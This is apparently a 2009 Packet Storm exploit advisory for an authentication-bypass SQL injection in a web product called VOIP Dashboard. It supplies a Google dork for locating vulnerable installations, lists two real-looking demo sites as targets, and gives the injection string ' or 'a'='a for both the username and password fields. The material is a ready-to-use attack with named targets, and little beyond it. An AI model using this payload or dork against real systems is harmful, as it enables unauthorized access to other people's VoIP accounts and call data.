VOIP Dashboard suffers from a remote SQL injection vulnerability that allows for authentication bypass.
73cf82122fabacafd807e8ae6df54bc560d7dc8292e58f616714461b16136199---------------------------------------------------------------------------------------------
[+] VOIP Dashboard (Auth Bypass)SQL Injection vulnerability
[+] Found By: Rohit Bansal [ SCHAP Security http://schap.org ]
[+] Date: 02-06-2009
----------------------------------------------------------------------------------------------------------------------------
Google Dork :
"
Download Dialer · International Rates · End User DashboardCDR DashboardAgent
Dashboard."
Demo:
http://cdr.anncalls.com/
http://cdr.extreme2calls.com/
User Name : ' or 'a'='a
Password : ' or 'a'='a
--------------------------------------------------------------------------------------------------------------------------
[+]^Rohit Bansal [rohitisback@gmail.com]
[+] Schap.org, Infysec, Evilfinger
-------------------------------------------------------------------------------------------------------------------------
--
"You only get smarter, by playing a smarter opponent !"
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed